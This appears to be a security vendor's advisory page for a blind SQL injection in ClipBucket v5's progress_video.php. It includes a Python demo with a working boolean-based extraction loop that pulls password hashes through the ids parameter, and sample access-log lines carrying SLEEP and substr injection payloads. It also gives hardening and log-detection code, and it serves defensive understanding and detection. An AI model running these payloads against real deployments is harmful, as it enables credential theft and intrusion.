HarborGuard Database

CVE-2026-45060 | Severity: CRITICAL | CNA: GitHub_M

CVE-2026-45060: ClipBucket: Blind SQL Injection in progress_video.php

ClipBucket v5 is an open source video sharing platform. Prior to version 5.5.3 - #129, the actions/progress_video.php endpoint is vulnerable to blind SQL injection. Any unauthenticated user can exploit the ids parameter to execute SQL queries and exfiltrate sensitive data. This issue has been patched in version 5.5.3 - #129.

Metrics

CVSS v3.1: 9.8
Severity: CRITICAL
Fixed in: 5.5.3 - #129
Affected products: 1


HarborGuard Analysis

Synopsis

Blind SQL injection in ClipBucket v5 allows any unauthenticated remote attacker to inject SQL through the ids parameter of the actions/progress_video.php endpoint. The endpoint is reachable over the network and requires no credentials or user interaction. The injection is blind: the attacker does not receive query output directly but infers it from differences in the response (content or timing), one condition per request, which is enough to read out arbitrary rows such as user credentials. The CVSS v3.1 vector rates confidentiality, integrity and availability impact as high; whether writes or stacked statements are possible in practice depends on the database driver and the privileges of the application's database account. The upstream fix is version 5.5.3 - #129; all earlier versions are affected.
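To make the mechanism concrete, the following is an added example, written for this page; it is not ClipBucket's code, not the patched code, and not HarborGuard tooling. It shows the pattern the advisory describes in a hypothetical handler that splices a comma-separated ids parameter straight into an IN (...) clause, a boolean-based blind extraction loop against that handler, and a hardened variant that allowlists the parameter shape and binds every id. The schema, table and column names, the rows and the stored hash are constructed for the demo, and SQLite in-memory stands in for the MySQL a real deployment uses.

```python
import re
import sqlite3
import string

# Constructed stand-in schema and rows for the demo; not ClipBucket's real tables,
# column names, or password hashes. SQLite in-memory is used in place of MySQL.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE video (videoid INTEGER PRIMARY KEY, status TEXT);
        CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT);
        INSERT INTO video VALUES (1, 'Successful'), (2, 'Processing'), (3, 'Failed');
        INSERT INTO users VALUES ('alice', '$2y$10$abc');
    """)
    return conn


def progress_vulnerable(conn, ids):
    """Hypothetical vulnerable handler (assumed pattern, not ClipBucket's code):
    the raw ids parameter is spliced into the IN list, so a ')' closes the list
    early and everything after it is parsed as SQL."""
    sql = "SELECT videoid, status FROM video WHERE videoid IN (" + ids + ")"
    return conn.execute(sql).fetchall()


IDS_FORMAT = re.compile(r"\d{1,10}(,\d{1,10})*")


def ids_well_formed(ids):
    """Allowlist: a comma-separated list of integers and nothing else."""
    return IDS_FORMAT.fullmatch(ids) is not None


def progress_hardened(conn, ids):
    """Hardened handler: reject anything that is not the expected shape, then
    bind each id as a query parameter so attacker bytes never reach the SQL text."""
    if not ids_well_formed(ids):
        raise ValueError("ids must be a comma-separated list of integers")
    id_list = [int(x) for x in ids.split(",")]
    placeholders = ",".join("?" for _ in id_list)
    sql = f"SELECT videoid, status FROM video WHERE videoid IN ({placeholders})"
    return conn.execute(sql, id_list).fetchall()


# Candidate characters for the probe. Quotes are left out so the payload stays
# syntactically valid; bcrypt-style hashes use only these characters.
CHARSET = string.ascii_letters + string.digits + "$./"


def blind_extract(conn, username, length, endpoint=progress_vulnerable):
    """Boolean-based blind extraction through the endpoint. Each probe asks one
    yes/no question: is character <pos> of this user's password hash equal to
    <c>? The row for video 1 comes back only when the answer is yes, so the
    attacker recovers the hash without ever seeing query output directly."""
    recovered = ""
    for pos in range(1, length + 1):
        for c in CHARSET:
            payload = (f"1) AND (SELECT substr(password,{pos},1) FROM users "
                       f"WHERE username='{username}')='{c}' -- ")
            if endpoint(conn, payload):
                recovered += c
                break
        else:
            break  # no candidate matched: stop rather than guess
    return recovered


def demo():
    """Run the whole scenario against a fresh in-memory database."""
    db = make_db()
    return {
        "legit": progress_vulnerable(db, "1,2"),
        "leaked_prefix": blind_extract(db, "alice", 3),
        "hardened_legit": progress_hardened(db, "1,2"),
        "payload_well_formed": ids_well_formed("1) AND 1=1 -- "),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value!r}")
```

The extraction loop needs one request per (position, candidate) pair, which is why blind injection leaves a trail of many near-identical requests from one source. Two caveats for a real target: MySQL's default collations compare strings case-insensitively, so a probe against MySQL has to force a binary comparison to tell 'y' from 'Y', and the hardened function shows the shape of a fix, not what the 5.5.3 - #129 change literally does.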

HarborGuard Coverage

Detection

Detection for CVE-2026-45060 is available across every HarborGuard environment, with the CVE matched against images in customer registries and CI/CD pipelines within minutes of publication. Coverage extends to custom-built images that bundle ClipBucket v5, not only official upstream images.

Available
Triage

HarborGuard scores this CVE at 9.8 CRITICAL using the CVSS v3.1 vector and surfaces it through each customer org's compliance-policy weighting to ensure it routes to the right team inbox without manual sorting. Per-environment policy configuration controls escalation thresholds and assignment rules.

Available
Patch

The upstream fix is ClipBucket v5 5.5.3 - #129. HarborGuard matches the affected-package range (< 5.5.3 - #129) against images on every ingest cycle and makes a patched-image rebuild available for affected workloads. For customers with auto-remediation enabled, the rebuild, regression run, and PR against affected workloads are triggered without manual intervention.

Fix available upstream (5.5.3 - #129)

Exploit Conditions

  • Network reachability: Required

    The vulnerable endpoint is served over HTTP, so the attacker must be able to reach the ClipBucket instance from the internet or from an internal network.

  • Authentication: Not required

    No credentials of any privilege level are required; the injection is reachable by fully anonymous requests.

  • Victim interaction: Not required

    The attacker sends requests directly to the server; no user action or social engineering is needed to trigger the vulnerability.

  • Attack complexity: Low

    Exploitation is deterministic; no race conditions, memory-layout dependencies, or special environmental factors need to align. Because the injection is blind, reading data out takes many requests (one per inferred character or condition), which costs the attacker time but not reliability.

Blast Radius

  • Reads database content reachable by the application's database account, including user credentials (password hashes), session data, private video metadata, and any other personal data the deployment stores.
  • Modifies or deletes persisted rows if the deployment's database driver and account allow writes from the injected statement, enabling account takeover, content manipulation, or destruction of platform data.
  • Degrades or takes down the platform through expensive or time-delayed queries (for example SLEEP-based probes sent in volume) that tie up database connections.
  • Enables pivoting to other internal services if the database account has file-read privileges or if the database holds secrets such as SMTP, storage, or API credentials in configuration tables.

How HarborGuard Handles This

Available on HarborGuard: the upstream fix for CVE-2026-45060 is ClipBucket v5 5.5.3 - #129. HarborGuard matches the affected range (< 5.5.3 - #129) against images on every ingest cycle and makes a patched-image rebuild available for affected workloads. For customers with auto-remediation enabled, that rebuild triggers a regression test run and opens a PR against any affected workloads, with no manual steps required. Upgrading to 5.5.3 - #129 is the fix; where that cannot happen immediately, compensating controls are strongly recommended: restrict inbound access to actions/progress_video.php to trusted sources with network-policy rules; put a web application firewall rule in front of it that admits the ids parameter only when it is a comma-separated list of integers (an allowlist of the expected shape is harder to bypass than a denylist of SQL metacharacters); and disable the endpoint entirely via feature flag or server configuration if the functionality is non-essential. Because the injection is blind, also review access logs for bursts of requests to this endpoint with unusual ids values from a single source, which is what an extraction attempt looks like in practice. The 9.8 CRITICAL score means this should be treated as an active-risk item until every affected image is rebuilt.
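An added example of the two interim controls above, written for this page and not part of the advisory or of HarborGuard's tooling: a WAF-style allowlist for the ids parameter (only comma-separated integers pass, which is stricter and less bypass-prone than blocking metacharacter patterns) and a log sweep that applies the same check to access-log lines for actions/progress_video.php and counts requests per source, since blind extraction shows up as a burst of near-identical requests from one address. The log lines, addresses, timestamps, user agents and the users table name inside the payloads are constructed for the demo.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-format lines for the demo, not real traffic. The
# addresses are documentation ranges and the 'users' table name in the payloads
# is a placeholder, not ClipBucket's schema.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Mar/2026:10:00:01 +0000] "GET /actions/progress_video.php?ids=12,13 HTTP/1.1" 200 87 "-" "Mozilla/5.0"
203.0.113.9 - - [01/Mar/2026:10:00:02 +0000] "GET /actions/progress_video.php?ids=1)%20AND%20(SELECT%20SLEEP(5))--%20 HTTP/1.1" 200 12 "-" "python-requests/2.31"
203.0.113.9 - - [01/Mar/2026:10:00:08 +0000] "GET /actions/progress_video.php?ids=1)+AND+substr((SELECT+password+FROM+users+LIMIT+1),1,1)%3D'a'--+ HTTP/1.1" 200 12 "-" "python-requests/2.31"
203.0.113.9 - - [01/Mar/2026:10:00:09 +0000] "GET /actions/progress_video.php?ids=1)+AND+substr((SELECT+password+FROM+users+LIMIT+1),1,1)%3D'b'--+ HTTP/1.1" 200 12 "-" "python-requests/2.31"
198.51.100.7 - - [01/Mar/2026:10:00:10 +0000] "GET /watch_video.php?v=abc HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
TARGET_PATH = "/actions/progress_video.php"
IDS_FORMAT = re.compile(r"\d{1,10}(,\d{1,10})*")


def ids_allowed(query_string):
    """WAF-style allowlist for a query string: every ids value must be a
    comma-separated list of integers. A missing (or blank) ids parameter
    passes; what to do with that is the application's decision, not the WAF's."""
    values = parse_qs(query_string).get("ids")
    if values is None:
        return True
    return all(IDS_FORMAT.fullmatch(v) for v in values)


def scan_log(text):
    """Sweep access-log lines. Returns (flagged, per_ip): flagged lists the
    progress_video.php requests whose ids failed the allowlist, with the value
    decoded so the analyst sees the payload as the database would; per_ip counts
    every request to the endpoint per source, because blind extraction is a
    volume signal even when individual requests look harmless."""
    flagged = []
    per_ip = Counter()
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        if parts.path != TARGET_PATH:
            continue
        per_ip[m["ip"]] += 1
        if not ids_allowed(parts.query):
            decoded = parse_qs(parts.query)["ids"][0]
            flagged.append({"ip": m["ip"], "ts": m["ts"], "ids": decoded})
    return flagged, per_ip


def noisy_sources(per_ip, threshold):
    """Sources with more than `threshold` requests to the endpoint in the window."""
    return sorted(ip for ip, n in per_ip.items() if n > threshold)


if __name__ == "__main__":
    hits, counts = scan_log(SAMPLE_LOG)
    for h in hits:
        print(f"{h['ts']} {h['ip']} ids={h['ids']!r}")
    print("noisy sources:", noisy_sources(counts, 2))
```

Run against real logs, the per-source count is the more durable signal: a WAF rule stops the payload shapes it knows, but an attacker who finds an encoding the rule misses still has to send hundreds of requests to the same endpoint to read anything out, and that volume is visible regardless of encoding.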

Affected packages
  • MacWarrior / clipbucket-v5
    < 5.5.3 - #129
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H